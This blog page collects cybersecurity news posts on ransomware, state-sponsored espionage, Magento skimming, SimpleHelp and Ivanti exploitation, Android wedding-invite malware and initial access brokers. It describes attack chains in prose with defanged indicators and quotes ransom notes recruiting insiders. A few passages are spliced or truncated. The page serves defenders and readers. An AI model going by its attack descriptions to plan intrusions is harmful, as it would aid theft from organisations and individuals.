Search This Blog

Powered by Blogger.

Blog Archive

Labels

About Me

Showing posts with label Hacking. Show all posts

Cybercrime in 2025: AI-Powered Attacks, Identity Exploits, and the Rise of Nation-State Threats

 


Cybercrime has evolved beyond traditional hacking, transforming into a highly organized and sophisticated industry. In 2025, cyber adversaries — ranging from financially motivated criminals to nation-state actors—are leveraging AI, identity-based attacks, and cloud exploitation to breach even the most secure organizations. The 2025 CrowdStrike Global Threat Report highlights how cybercriminals now operate like businesses. 

One of the fastest-growing trends is Access-as-a-Service, where initial access brokers infiltrate networks and sell entry points to ransomware groups and other malicious actors. The shift from traditional malware to identity-based attacks is accelerating, with 79% of observed breaches relying on valid credentials and remote administration tools instead of malicious software. Attackers are also moving faster than ever. Breakout times—the speed at which cybercriminals move laterally within a network after breaching it—have hit a record low of just 48 minutes, with the fastest observed attack spreading in just 51 seconds. 

This efficiency is fueled by AI-driven automation, making intrusions more effective and harder to detect. AI has also revolutionized social engineering. AI-generated phishing emails now have a 54% click-through rate, compared to just 12% for human-written ones. Deepfake technology is being used to execute business email compromise scams, such as a $25.6 million fraud involving an AI-generated video. In a more alarming development, North Korean hackers have used AI to create fake LinkedIn profiles and manipulate job interviews, gaining insider access to corporate networks. 

The rise of AI in cybercrime is mirrored by the increasing sophistication of nation-state cyber operations. China, in particular, has expanded its offensive capabilities, with a 150% increase in cyber activity targeting finance, manufacturing, and media sectors. Groups like Vanguard Panda are embedding themselves within critical infrastructure networks, potentially preparing for geopolitical conflicts. 

As traditional perimeter security becomes obsolete, organizations must shift to identity-focused protection strategies. Cybercriminals are exploiting cloud vulnerabilities, leading to a 35% rise in cloud intrusions, while access broker activity has surged by 50%, demonstrating the growing value of stolen credentials. 

To combat these evolving threats, enterprises must adopt new security measures. Continuous identity monitoring, AI-driven threat detection, and cross-domain visibility are now critical. As cyber adversaries continue to innovate, businesses must stay ahead—or risk becoming the next target in this rapidly evolving digital battlefield.

North Korean Hackers Exploit ZIP Files in Sophisticated Cyber Attacks

 

State-sponsored hacking group APT37 (ScarCruft) is deploying advanced cyber-espionage tactics to infiltrate systems using malicious ZIP files containing LNK shortcuts. These files are typically disguised as documents related to North Korean affairs or trade agreements and are spread through phishing emails.

Once opened, the attack unfolds in multiple stages, leveraging PowerShell scripts and batch files to install the RokRat remote access Trojan (RAT) as the final payload.

The infection starts with carefully crafted phishing emails, often using real information from legitimate websites to enhance credibility. These emails contain malicious ZIP attachments housing LNK files. When executed, the LNK file verifies its directory path, relocating itself to %temp% if necessary.

It then extracts multiple components, including:

-A decoy HWPX document
-A batch script (shark.bat)

Additional payloads like caption.dat and elephant.dat
The shark.bat script executes PowerShell commands discreetly, launching the elephant.dat script, which decrypts caption.dat using an XOR key. The decrypted content is then executed in memory, ultimately deploying RokRat RAT.

Once active, RokRat collects detailed system information, such as:
  • Operating system version
  • Computer name
  • Logged-in user details
  • Running processes
  • Screenshots of the infected system
The stolen data is then exfiltrated to command-and-control (C2) servers via legitimate cloud services like pCloud, Yandex, and Dropbox, utilizing their APIs to send, download, and delete files while embedding OAuth tokens for stealthy communication.

RokRat also allows attackers to execute remote commands, conduct system reconnaissance, and terminate processes. To avoid detection, it implements anti-analysis techniques, including:
  • Detecting virtual environments via VMware Tools
  • Sandbox detection by creating and deleting temporary files
  • Debugger detection using IsDebuggerPresent
The malware ensures secure communication by encrypting data using XOR and RSA encryption, while C2 commands are received in AES-CBC encrypted form, decrypted locally, and executed on the compromised system. These commands facilitate data collection, file deletion, and malware termination.

By leveraging legitimate cloud services, RokRat seamlessly blends into normal network traffic, making detection more challenging.

“This sophisticated approach highlights the evolving tactics of APT37, as they continue to adapt and expand their operations beyond traditional targets, now focusing on both Windows and Android platforms through phishing campaigns.”

As APT37 refines its cyberattack strategies, organizations must remain vigilant against such persistent threats and enhance their cybersecurity defenses.

University of Notre Dame Hit by Cyberattack— Hackers Say They Stole Everything

 



A cybercriminal group known as Fog Ransomware has claimed responsibility for a cyberattack on the University of Notre Dame in Perth, Australia. According to reports, the group has allegedly stolen 62.2GB of sensitive data, including student medical records, staff and student contact information, and confidential documents.  


Hackers Announce Data Theft on the Dark Web  

The university was first alerted to a cybersecurity breach in January 2025. Recently, technology news sources revealed that Fog Ransomware had posted details of the attack on its dark web leak site. The group claimed to have accessed and stolen a large amount of private and institutional information.  

As of now, the hackers have not made any ransom demands or issued a deadline for payment. Cybersecurity experts believe that this group has a history of targeting educational and recreational institutions worldwide.  


How the Attack Has Affected the University  

The cyberattack has disrupted essential university operations, making it difficult for students and staff to access key services. Some of the areas impacted include:  

1. Payroll and leave management – Employees have been unable to process payments and leave applications as usual. Temporary manual processes have been put in place.  

2. Student enrolments and timetables – Many students have struggled to access their class schedules and register for courses.  

3. Communication services – Internet and email systems have also been affected, causing delays in official university communication.  

University official Patrick Hampton, who is both the Deputy Head of Education and President of the National Tertiary Education Union WA Notre Dame branch, stated that the attack had disrupted critical functions necessary for the university’s daily operations. He also emphasized that staff and students need additional support to cope with these challenges.  


Uncertainty Over the Full Extent of the Data Breach  

At this stage, the university has not been able to confirm exactly what data has been stolen. A spokesperson explained that while primary systems handling student records, finance, and human resources appear secure, some separately stored data might have been compromised.  

To assess the situation, the university has engaged international cybersecurity experts and is working to determine the extent of the breach. Officials have assured that if any personal data is found to be affected, the university will notify those impacted as soon as possible.  


Response and Future Actions

The incident has been reported to the Australian Cyber Security Centre (ACSC), and the university is taking necessary precautions to strengthen its security measures. Despite the ongoing challenges, the university has confirmed that classes for the 2025 academic year will begin as scheduled.  

Meanwhile, the staff union is pushing for greater transparency from the university administration. They are demanding that university leadership keep staff and students fully informed about what data has been compromised and provide assurances about data protection measures moving forward.  

This attack is a reminder of the increasing cybersecurity threats faced by educational institutions. Universities hold vast amounts of sensitive student and staff data, making them prime targets for cybercriminals. 

Internal Chat Logs of Black Basta Ransomware Gang Leaked Online

 

A previously unidentified source has leaked what is claimed to be an archive of internal Matrix chat logs linked to the Black Basta ransomware group. The individual behind the leak, known as ExploitWhispers, initially uploaded the stolen messages to the MEGA file-sharing platform, which has since taken them down. However, they have now made the archive available through a dedicated Telegram channel.

It remains uncertain whether ExploitWhispers is a cybersecurity researcher who infiltrated the group's internal chat server or a discontented member of the operation. While no specific reason was provided for the leak, cybersecurity intelligence firm PRODAFT suggested that it could be a direct consequence of the ransomware gang’s alleged attacks on Russian banks.

"As part of our continuous monitoring, we've observed that BLACKBASTA (Vengeful Mantis) has been mostly inactive since the start of the year due to internal conflicts. Some of its operators scammed victims by collecting ransom payments without providing functional decryptors," PRODAFT stated.

"On February 11, 2025, a major leak exposed BLACKBASTA's internal Matrix chat logs. The leaker claimed they released the data because the group was targeting Russian banks. This leak closely resembles the previous Conti leaks."

The leaked archive contains internal chat messages exchanged between September 18, 2023, and September 28, 2024. A review conducted by BleepingComputer reveals that the messages encompass a broad range of sensitive information, including phishing templates, email addresses for targeting, cryptocurrency wallets, data dumps, victims' login credentials, and confirmations of previously reported attack strategies.

Additionally, the leaked records contain 367 unique ZoomInfo links, potentially reflecting the number of organizations targeted during the specified timeframe. Ransomware groups frequently use ZoomInfo to gather intelligence on their targets, either internally or for negotiations with victims.

ExploitWhispers also disclosed information about key Black Basta members, identifying Lapa as an administrator, Cortes as a threat actor connected to the Qakbot malware group, and YY as the primary administrator. Another individual, referred to as Trump (also known as GG and AA), is believed to be Oleg Nefedov, who is suspected of leading the operation.

Black Basta operates as a Ransomware-as-a-Service (RaaS) group, first emerging in April 2022. The gang has targeted several high-profile organizations across various industries, including healthcare, government contractors, and major corporations.

Notable victims include German defense contractor Rheinmetall, Hyundai's European division, BT Group (formerly British Telecom), U.S. healthcare provider Ascension, government contractor ABB, the American Dental Association, U.K. tech outsourcing firm Capita, the Toronto Public Library, and Yellow Pages Canada.

A joint report from CISA and the FBI, published in May 2024, revealed that Black Basta affiliates compromised more than 500 organizations between April 2022 and May 2024.

Research from Corvus Insurance and Elliptic estimates that the ransomware gang collected approximately $100 million in ransom payments from over 90 victims by November 2023.

This incident bears similarities to the February 2022 data breach involving the Russian-based Conti cybercrime syndicate. At that time, a Ukrainian security researcher leaked over 170,000 internal chat messages and the source code for the Conti ransomware encryptor, following the group's public support for Russia amid the Ukraine conflict.

Hackers Target South America and Southeast Asia

 



A group of hackers has been caught running a large-scale cyber spying operation, now called REF7707. The attack was first noticed in November 2024 when strange activity was detected in the Foreign Ministry of a South American country. As experts looked deeper, they found that the same hackers had also targeted several other organizations in Southeast Asia.  

The attackers used advanced hacking tools to break into computer systems, steal information, and stay hidden for a long time. However, even though they were highly skilled, they made serious mistakes that exposed their operation.  


The Malicious Software Used in the Attack  

The hackers used three main types of malware (harmful programs) to infect computers and control them remotely:  

FINALDRAFT: A Hidden Control System 

One of the key tools in this attack was FINALDRAFT, a type of software that allowed hackers to secretly take control of a computer. Once installed, they could:  

  • Run commands: Hackers could make the infected computer perform actions, like downloading more malware or collecting sensitive files.  
  • Hide in normal programs: They inserted their malicious code into everyday programs like MS Paint, making it harder for security software to detect.  
  • Use Microsoft’s online services: The hackers used Microsoft Graph API, a service that businesses commonly use, to blend their malicious activities with normal traffic.  


GUIDLOADER and PATHLOADER: Sneaky Installers

These two programs acted as delivery tools that installed FINALDRAFT on infected computers. Instead of storing dangerous files on a computer’s hard drive (where they could be detected), they loaded the malware directly into the computer’s memory. This method helps cybercriminals avoid antivirus scans.  

To further cover their tracks, they hid malware downloads on popular websites, including:  

1. Google Firebase (a cloud service used by developers)  

2. Pastebin (a site often used to store and share text)  

3. Web storage systems of Southeast Asian universities  

By using trusted websites, they made it harder for security systems to recognize the attack.  


Hackers Misused Windows Tools to Spread  

Instead of only relying on their own hacking tools, the attackers took advantage of built-in Windows programs to spread across networks:  

  • Certutil.exe: A program designed to manage security certificates, but in this case, hackers misused it to download and install their malware.  
  • Windows Remote Management (WinRM): A legitimate Windows tool that lets administrators control computers remotely. The hackers used this to jump from one system to another, meaning they likely stole passwords from previous attacks.  

By using tools that were already part of Windows, they avoided setting off alarms that custom-made malware might trigger.  


How the Hackers Were Caught  

Even though REF7707 was a well-planned attack, the hackers made several big mistakes that helped cybersecurity experts uncover their activities.  

Key Errors They Made:

1. Left behind test versions of their malware: Some samples contained error messages and incomplete code, revealing how they built their attack.  

2. Exposed their own websites: Many of their fake websites remained open and accessible, allowing experts to track their movements.  

3. Messed up their encryption: Some malware was poorly coded, which made it easier for researchers to analyze and understand how it worked.  


Tracing the Hackers’ Footsteps  

By following these mistakes, security researchers tracked the hackers’ network of fake websites and compromised services. Some of the suspicious domains they discovered included:  

1. digert.ictnsc[.]com

2. support.vmphere[.]com  

3. hobiter[.]com and vm-clouds[.]net, which shared the same setup, suggesting they were controlled by the same group.  

The attackers also abused Microsoft’s services to make their hacking traffic look like normal company activity.  


What We Can Learn from This Attack

REF7707 is a clear example of how cybercriminals use sophisticated tricks to break into important systems, stay hidden, and steal data. But it also proves that even expert hackers can make mistakes— and when they do, security teams can use those errors to track them down.  

Hackers are constantly improving their tactics, but as this case shows, cybersecurity experts are also getting better at catching them.  


Cybercriminals Exploit Google Tag Manager to Steal Payment Data from Magento Sites

 

Cybercriminals have been leveraging Google Tag Manager (GTM) to inject malware into Magento-powered eCommerce websites, compromising customer payment data, according to cybersecurity experts.

Security researchers at Sucuri recently detected a live attack where a Magento-based online store suffered a credit card data breach. The investigation led to a malicious script embedded within Google Tag Manager, which, while appearing to be a standard tracking tool, was designed to steal sensitive payment information.

Google Tag Manager is a widely used tag management system that enables website owners to deploy tracking codes without modifying site code directly. However, attackers obfuscate the injected script, making detection difficult. The malware captures payment details at checkout and transmits them to a remote server. Researchers also discovered a backdoor, allowing persistent access to compromised sites.

At least six websites were found infected with the same GTM ID, and one domain used in the attack, eurowebmonitortool[dot]com, has now been blacklisted by major security firms. Cybersecurity experts emphasize that this attack method is not new. Sucuri researchers had previously identified similar threats, reaffirming that this technique is "still being widely used."

Given its popularity among eCommerce businesses, Magento remains a primary target for cybercriminals. Stolen payment data can be exploited for fraudulent purchases, malvertising campaigns, and other illicit activities.

Security Measures for Protection
To mitigate risks, website administrators should:
  • Remove any suspicious GTM tags
  • Conduct a full security scan
  • Ensure Magento and all extensions are updated
  • Regularly monitor site traffic and GTM configurations for anomalies
Proactive cybersecurity measures and ongoing vulnerability monitoring are crucial to safeguarding eCommerce platforms from such sophisticated attacks.

Cybercriminals Intensify Attacks on Password Managers

 

Cybercriminals are increasingly setting their sights on password managers as a way to infiltrate critical digital accounts.

According to Picus Security’s Red Report 2025, which analyzed over a million malware samples from the past year, a quarter (25%) of all malware now targets credentials stored in password managers. Researchers noted that this marks a threefold surge compared to the previous year.

“For the first time ever, stealing credentials from password stores is in the top 10 techniques listed in the MITRE ATT&CK Framework,” they said. “The report reveals that these top 10 techniques accounted for 9Beyond the growing frequency of attacks, hackers are also deploying more advanced techniques. 3% of all malicious actions in 2024.”

Advanced Hacking Techniques

Dr. Suleyman Ozarslan, co-founder and VP of Picus Labs, revealed that cybercriminals use sophisticated methods like memory scraping, registry harvesting, and breaching both local and cloud-based password stores to extract credentials.

To counter this rising threat, Ozarslan emphasized the importance of using password managers alongside multi-factor authentication (MFA). He also warned against password reuse, particularly for password.

Beyond the growing frequency of attacks, hackers are also deploying more advanced techniques. Picus Security highlighted that modern cybercriminals are now favoring long-term, multi-stage attacks that leverage a new generation of malware. These advanced infostealers are designed for stealth, persistence, and automation.

Researchers compared this evolution in cyber threats to “the perfect heist,” noting that most malware samples execute over a dozen malicious actions to bypass security defenses, escalate privileges, and exfiltrate data.

A password manager is a cybersecurity tool that securely stores, generates, and auto-fills strong passwords across websites and apps. By eliminating the need to remember multiple passwords, it strengthens security and reduces the risk of breaches. Experts consider it an essential component of cybersecurity best practices.

Hackers Exploit SimpleHelp RMM Vulnerabilities to Deploy Backdoors and Create Admin Accounts

 

Management (RMM) clients to gain administrative control, install backdoors, and possibly set the stage for ransomware deployment.

The vulnerabilities, identified as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, were initially flagged by Arctic Wolf as potential attack vectors last week. While the firm could not verify active exploitation, cybersecurity company Field Effect has now confirmed their abuse in ongoing cyberattacks.

Field Effect shared its findings with BleepingComputer, highlighting that the attack patterns bear similarities to Akira ransomware activity. However, researchers lack definitive evidence to attribute these attacks with high confidence.

The breach begins when attackers exploit SimpleHelp RMM vulnerabilities to gain unauthorized access to a target system. The initial connection originates from IP address 194.76.227[.]171, linked to an Estonian server running a SimpleHelp instance on port 80.

Once inside, the attackers execute reconnaissance commands to gather information on system architecture, user privileges, network configurations, scheduled tasks, services, and Domain Controller (DC) details. Researchers also observed a specific command attempting to identify the CrowdStrike Falcon security suite, likely as part of an evasion strategy.

Leveraging this access, the hackers create a new administrator account ("sqladmin") to maintain persistence. They then deploy Sliver, a post-exploitation framework (agent.exe) increasingly used as an alternative to Cobalt Strike, which security tools now frequently detect.

Once executed, Sliver connects to a command-and-control (C2) server in the Netherlands, allowing remote command execution. Field Effect also discovered a backup IP with Remote Desktop Protocol (RDP) enabled, indicating additional persistence measures.

After securing initial access, the attackers escalate their attack by compromising the Domain Controller (DC) via the same SimpleHelp RMM client. They create another admin account ("fpmhlttech") and, instead of deploying a conventional backdoor, install a Cloudflare Tunnel disguised as Windows svchost.exe to bypass security defenses and maintain stealthy access.

To safeguard against these threats, SimpleHelp users must immediately apply security updates addressing CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728. Users should also:

  • Audit admin accounts: Look for unauthorized accounts like "sqladmin" and "fpmhlttech".
  • Monitor network connections: Check for any connections to suspicious IPs flagged in Field Effect’s report.
  • Restrict RMM access: Limit SimpleHelp usage to trusted IP ranges to prevent unauthorized logins.
By following these security measures, organizations can mitigate risks associated with SimpleHelp RMM vulnerabilities and prevent potential ransomware attacks.

Cybercriminals Entice Insiders with Ransomware Recruitment Ads

 

Cybercriminals are adopting a new strategy in their ransomware demands—embedding advertisements to recruit insiders willing to leak company data.

Threat intelligence researchers at GroupSense recently shared their findings with Dark Reading, highlighting this emerging tactic. According to their analysis, ransomware groups such as Sarcoma and DoNex—believed to be impersonating LockBit—have started incorporating these recruitment messages into their ransom notes.

A typical ransom note includes standard details about the company’s compromised state, data breaches, and backup destruction. However, deeper into the message, these groups introduce an unusual proposition:

"If you help us find this company's dirty laundry you will be rewarded. You can tell your friends about us. If you or your friend hates his boss, write to us and we will make him cry and the real hero will get a reward from us."

In another instance, the ransom note offers financial incentives:

"Would you like to earn millions of dollars $$$? Our company acquires access to networks of various companies, as well as insider information that can help you steal the most valuable data of any company. You can provide us accounting data for the access to any company, for example, login and password to RDP, VP, corporate email, etc."

The note then instructs interested individuals on how to install malicious software on their workplace systems, with communication facilitated via Tox messenger to maintain anonymity.

Kurtis Minder, CEO and founder of GroupSense, stated that while his team regularly examines ransom notes during incident response, the inclusion of these “pseudo advertisements” is a recent development.

"I've been asking my team and kind of speculating as to why this would be a good place to put an advertisement," said Minder. "I don't know the right answer, but obviously these notes do get passed around." He further noted that cybercriminals often experiment with new tactics, and once one group adopts an approach, others tend to follow suit.

For anyone tempted to respond to these offers, Minder warns of the significant risks involved: "These folks have no accountability, so there's no guarantee you would get paid anything. You trying to capitalize on this is pretty risky from an outcome perspective."

GroupSense continues to analyze past ransomware communications for any early signs of this trend. Minder anticipates discovering more instances of these ads in upcoming investigations.

Fake Wedding Invitations Used to Hack Phones in Southeast Asia

 



Cybercriminals have found a new way to trick smartphone users, fake wedding invitations. According to cybersecurity researchers, a newly discovered malware named Tria is being used to infect Android devices, primarily in Malaysia and Brunei. The attackers are disguising malicious links as wedding invitations and sending them via WhatsApp and Telegram to unsuspecting victims.  

Once a user clicks the link and downloads the application, the malware starts working silently in the background, stealing sensitive personal information.  


How the Malware Works  

This cyberattack has been active since mid-2024. It follows a simple but effective strategy:  

1. The hackers send a fake wedding invitation through group or private chats.  

2. The invitation asks recipients to download an app to access event details.  

3. Once installed, the app secretly collects private information from the victim’s phone.  

The stolen data includes:  

  • Text messages (SMS)  
  • Emails from accounts like Gmail and Outlook 
  • Call history  
  • Messages from apps like WhatsApp and WhatsApp Business  


Cybersecurity experts warn that this stolen data can be used in several ways, including:  

1. Hijacking banking accounts  

2. Resetting passwords for email and social media  

3. Taking over messaging apps to send fraudulent messages  


Why Hackers Want Control of Your Messaging Apps  

One of the biggest concerns is that hackers aim to take control of WhatsApp and Telegram accounts. Once they gain access, they can:  

  • Send malicious links to more people, spreading the malware further.  
  • Pretend to be the victim and ask contacts for money.  
  • Steal private conversations and sensitive business information.  


To process the stolen data, cybercriminals use Telegram bots, automated systems that collect and sort the information.  

  • One bot gathers data from messaging apps and emails.  
  • Another bot handles SMS messages.  

The exact group responsible for this attack is unknown, but cybersecurity researchers suspect that the hackers speak Indonesian. They have not been linked to any specific organization yet.  


Similarities to Previous Attacks  

This type of scam is not entirely new. In 2023, cybersecurity experts discovered a malware campaign called UdangaSteal, which targeted users in Indonesia, Malaysia, and India.  

1. UdangaSteal also used fake invitations and job offers to trick victims.  

2. It mainly focused on stealing SMS messages.  

However, Tria is more advanced because it collects a wider range of data, including emails and instant messaging conversations.  


How to Protect Yourself  

Cybersecurity experts recommend taking extra precautions to avoid falling victim to such scams:  

1. Be cautious of unexpected messages, even from known contacts.  

2. Never download apps from links shared in messaging apps.  

3. Use official app stores (Google Play Store) to download apps.  

4. Enable two-factor authentication (2FA) for your accounts.  

5. Verify invitations by calling or messaging the sender directly.

As online scams grow more intricate, staying vigilant is the best way to protect your personal data. If something seems too unusual or suspicious, it’s best to ignore it.

New 'Browser Syncjacking' Attack Exploits Chrome Extensions for Full Device Takeover

 

'Browser Syncjacking,' which allows threat actors to hijack Google profiles, compromise browsers, and eventually gain full control over a victim's device—all through a seemingly harmless Chrome extension.

This stealthy multi-stage attack requires minimal permissions and almost no user interaction beyond installing a malicious Chrome extension. The attack begins with:

1. Fake Google Workspace Setup – Attackers create a fraudulent Google Workspace domain with pre-configured user profiles where security features like multi-factor authentication are disabled.

2. Publishing a Malicious Extension – A Chrome extension, disguised as a useful tool, is uploaded to the Chrome Web Store.

3. Social Engineering Trap – Victims are tricked into installing the extension, which then secretly logs them into an attacker's managed Google Workspace profile via a hidden browser session.

4. Sync Activation – The extension opens a legitimate Google support page and injects content instructing users to enable Chrome Sync. Once activated, attackers gain access to stored credentials, browsing history, and other sensitive data.

5. Full Browser Takeover – Using deceptive tactics, such as a fake Zoom update prompt, the extension delivers an executable file containing an enrollment token. This grants attackers full control over the browser.

"Once enrolled, the attacker gains full control over the victim's browser, allowing them to silently access all web apps, install additional malicious extensions, redirect users to phishing sites, monitor/modify file downloads, and many more," explains SquareX researchers.

By leveraging Chrome's Native Messaging API, attackers establish a direct communication channel between the malicious extension and the victim's operating system. This enables them to:
  • Browse directories
  • Modify files
  • Install malware
  • Execute commands
  • Capture keystrokes
  • Extract sensitive data
  • Activate the webcam and microphone
The Browser Syncjacking attack is difficult to detect. Unlike traditional extension-based threats that require extensive social engineering, this method operates with minimal user interaction.

"Unless the victim is extremely security paranoid and is technically savvy enough to constantly navigate the Chrome settings to look for managed browser labels, there is no real visual indication that a browser has been hijacked," the report warns.

Recent incidents, including hijacks of legitimate Chrome extensions, have demonstrated that browser extensions pose significant cybersecurity risks.

BleepingComputer has reached out to Google for comments on this new attack and will provide updates as soon as a response is received.

Hackers Exploit WordPress Sites to Attack Mac and Windows Users


According to security experts, threat actors are abusing out-of-date versions of WordPress and plug-ins to modify thousands of sites to trap visitors into downloading and installing malware.

In a conversation with cybersecurity news portal TechCrunch, Simon Wijckmans, founder and CEO of the web security company c/side, said the hacking campaign is still “very much live”.

Spray and pray campaign

The hackers aim to distribute malware to loot passwords and sensitive data from Mac and Windows users. According to c/side, a few hacked websites rank among the most popular ones on the internet. Reporting on the company’s findings, Himanshu Anand believes it is a “widespread and very commercialized attack” and told TechCrunch the campaign is a “spray and pray” cyber attack targeting website visitors instead of a specific group or a person.

After the hacked WordPress sites load in a user’s browser, the content immediately turns to show a false Chrome browser update page, asking the website visitor (user) to download and install an update to access the website, researchers believe. 

Users tricked via fake sites

When a visitor agrees to the update, the compromised website will ask the user to download a harmful malware file disguised as the update, depending on whether the visitor is a Mac or Windows user. Researchers have informed Automattic (the company) that makes and distributes Wordpress.com about the attack campaign and sent a list of harmful domains. 

According to TechCrunch, Megan Fox, spokesperson for Automattic, did not comment at the time of press. Later, Automattic clarified that the security of third-party plugins is the responsibility of WordPress developers.

“There are specific guidelines that plugin authors must consult and adhere to ensure the overall quality of their plugins and the safety of their users,” Ms Fox told TechCrunch. “Authors have access to a Plugin Handbook which covers numerous security topics, including best practices and managing plugin security,” she added. 

C/side has traced over 10,000 sites that may have been a target of this hacking campaign. The company found malicious scripts on various domains by crawling the internet, using a reverse DNS lookup to find domains and sites linked with few IP addresses which exposed a wider number of domains hosting malicious scripts. TechCrunch has not confirmed claims of C/side’s data, but it did find a WordPress site showing malicious content earlier this week.

Phishing Attacks Surge by 30% in Australia Amid Growing Cyber Threats

 

kAustralia witnessed a sharp 30% rise in phishing emails last year, as cybercriminals increasingly targeted the Asia-Pacific (APAC) region, according to a recent study by security firm Abnormal Security. The APAC region’s expanding presence in critical industries, such as data centers and telecommunications, has made it a prime target for cyber threats.

Across APAC, credential phishing attacks surged by 30.5% between 2023 and 2024, with New Zealand experiencing a 30% rise. Japan and Singapore faced even greater increases at 37%. Among all advanced email-based threats—including business email compromise (BEC) and malware attacks—phishing saw the most significant spike.

“The surge in attack volume across the APAC region can likely be attributed to several factors, including the strategic significance of its countries as epicentres for trade, finance, and defence,” said Tim Bentley, Vice President of APJ at Abnormal Security.

“This makes organisations in the region attractive targets for complex email campaigns designed to exploit economic dynamics, disrupt essential industries, and steal sensitive data.”

Between 2023 and 2024, advanced email attacks across APAC—including Australia, New Zealand, Japan, and Singapore—rose by 26.9% on a median monthly basis. The increase was particularly notable between Q1 and Q2 of 2024 (16%) and further escalated from Q2 to Q3 (20%).

While phishing remains the primary attack method, BEC scams—including executive impersonation and payment fraud—grew by 6% year-over-year. A single successful BEC attack cost an average of USD $137,000 in 2023, according to Abnormal Security.

Australia has long been a key target for cybercriminals. A 2023 Rubrik survey revealed that Australian organizations faced the highest data breach rates globally.

Antoine Le Tard, Vice President for Asia-Pacific and Japan at Rubrik, previously noted that Australia’s status as an early adopter of cloud and enterprise security solutions may have led to rapid deployment at the expense of robust cybersecurity measures.

The Australian Signals Directorate reported that only 15% of government agencies met the minimum cybersecurity standards in 2024, a steep drop from 25% in 2023. The reluctance to adopt passkey authentication methods further reflects the cybersecurity maturity challenges in the public sector.

The widespread accessibility of AI chatbots has altered the cybersecurity landscape, making phishing attacks more sophisticated. Even jailbroken AI models enable cybercriminals to create phishing content effortlessly, reducing technical barriers for attackers.

AI-driven cyber threats are on the rise, with AI-powered chatbots listed among the top security risks for 2025. According to Vipre, BEC attacks in Q2 2024 increased by 20% year-over-year, with two-fifths of these scams generated using AI tools.

In June, HP intercepted a malware-laden email campaign featuring a script that was “highly likely” created using generative AI. Cybercriminals are also leveraging AI chatbots to establish trust with victims before launching scams—mirroring how businesses use AI for customer engagement.

FBI Hacks 4,200 Computers to Remove PlugX Malware Linked to Chinese Hackers

 

The FBI has successfully hacked and removed PlugX malware from approximately 4,200 computers across the US in a large-scale cybersecurity operation. The malware, allegedly deployed by the China-based hacking group known as “Mustang Panda” or “Twill Typhoon,” has been used since at least 2012 to steal sensitive information from victims in the US, Asia, and Europe. 

The Department of Justice announced the takedown on Tuesday, highlighting the collaborative efforts with French law enforcement to mitigate the cyber threat and prevent further damage. PlugX malware, which infects Windows computers via USB ports, allows hackers to gain unauthorized access and remotely execute commands on compromised systems. The malware operates stealthily in the background, enabling cybercriminals to exfiltrate data, monitor activity, and take control of infected machines. 

According to the FBI, compromised computers establish a connection with a command-and-control server operated by the attackers, with the malware’s IP address embedded directly into the code. Since September 2023, at least 45,000 US-based IP addresses have communicated with the server, indicating the widespread reach of the cyberattack. To eliminate the malware, the FBI leveraged the same exploit used by the attackers. After gaining access to the command-and-control infrastructure, agents retrieved the IP addresses of affected devices and issued a native command that instructed PlugX to delete itself from compromised systems. 

This command removed all files created by the malware, stopped its operation, and ensured its permanent deletion from the infected machines. The successful execution of this operation marks a significant step in neutralizing the ongoing cyber threat posed by Mustang Panda. This coordinated effort was not the first time the FBI has intervened remotely to remove malicious software from infected systems. 

In 2023, the agency dismantled a network of Quakbot-infected computers by deploying an uninstallation tool to affected devices, effectively neutralizing the botnet. Similarly, in 2021, the FBI took proactive measures to counter the Hafnium hack, which targeted Microsoft Exchange servers, by remotely patching vulnerabilities and securing affected systems. These operations demonstrate the FBI’s evolving approach to addressing cyber threats through direct intervention and international cooperation. 

Despite these successful operations, cybersecurity experts warn that PlugX and similar malware strains continue to pose a significant risk, especially given their ability to spread through USB devices. Organizations and individuals are advised to remain vigilant by implementing strong cybersecurity practices such as regularly updating software, disabling USB autorun features, and using endpoint protection tools to detect and prevent unauthorized access. 

The FBI’s decisive action highlights the persistent threat posed by state-sponsored hacking groups and underscores the importance of international collaboration in combating cybercrime. Moving forward, law enforcement agencies are expected to adopt more aggressive measures to counter cyber threats and protect sensitive information from being exploited by malicious actors.

Hackers Exploit Ivanti VPN Flaw to Install New Malware

 



A newly discovered vulnerability in Ivanti Connect Secure VPN systems, called CVE-2025-0282, has been actively exploited by hackers to deploy custom malware. This critical security flaw affects older versions of Ivanti’s VPN appliances, including Connect Secure, Policy Secure, and Neurons for ZTA gateways. Despite the wide impact, Ivanti has clarified that the attacks are currently limited to a small number of users.

The problem was a stack-based buffer overflow that could be exploited by hackers using specially crafted requests to breach systems. The breaches were reported to have started in December 2024 by Mandiant, a leading cybersecurity firm. Hackers accessed the compromised devices using this flaw, disabled all important security settings, and installed malicious software.

New Malware Families Identified

During the course of the investigation, two other malware variants, Dryhook and Phasejam, were discovered on infected systems. There is no established connection between these malware families and any known hacking groups. In addition, hackers utilized a toolkit named Spawn, which is also used by suspected Chinese espionage groups. 

Dryhook: This malware captures login credentials, such as usernames and passwords, during the authentication process.

Phasejam: A dropper that installs malicious web shells, allowing hackers to execute commands remotely.  

How the Attack Works  

The attack process involves several steps:  

1. Identifying Targets: Hackers scan devices using specialized HTTP requests to identify vulnerable systems.  

2. Exploitation: They exploit the CVE-2025-0282 flaw to bypass security.

3. Malware Deployment: They disable protections, modify system files, and install tools such as backdoors and tunneling utilities once inside.  

4. Data Theft: They steal sensitive information, including session details and credentials. This data is often archived and staged for transfer via public servers.  

5. Maintaining Access: Hackers alter upgrade processes, making their changes persist even after system updates.

When the vulnerability was discovered, more than 3,600 Ivanti VPN devices were exposed online. Although the number decreased to around 2,800 after the software patch, most systems are still exposed to this threat.

What Can Be Done? 

To defend against this threat, Ivanti advises doing the following:

  • Update Software: Install the latest version of Ivanti Connect Secure, version 22.7R2.5 or newer.
  • Factory Reset: That would erase the entire malware infection by resetting the device.  
  • Monitor for Signs of Attack: That would use Mandiant's shared IoCs and detection rules to identify malicious activity.  

Why it Matters

This makes it strongly essential for organizations to pay much heed to their cybersecurity. Hackers have become really intricate in operation, where they steal the most sensitive data from widely used systems such as VPNs. Businesses need to be alert and update their system with frequent revisions in the security policies to curb these threats.




How Hackers Sell Access to Corporate Systems Using Stolen Credentials

 


In the cybercrime world, Initial Access Brokers (IABs) are essential for facilitating attacks. These specific hackers break into company systems, steal login credentials, and then sell access to other criminals who use it to launch their own attacks. They essentially act as locksmiths for hackers, making it easy for those willing to pay to get into systems.

What Exactly Do IABs Do?

IABs function as a business where they sell access to corporate systems stolen from their organizations on dark markets, either private forums or Telegram channels. The credentials offered include the most basic login information and even the highest administrator accounts. They even have guarantees by giving a refund if the stolen credentials fail to work.

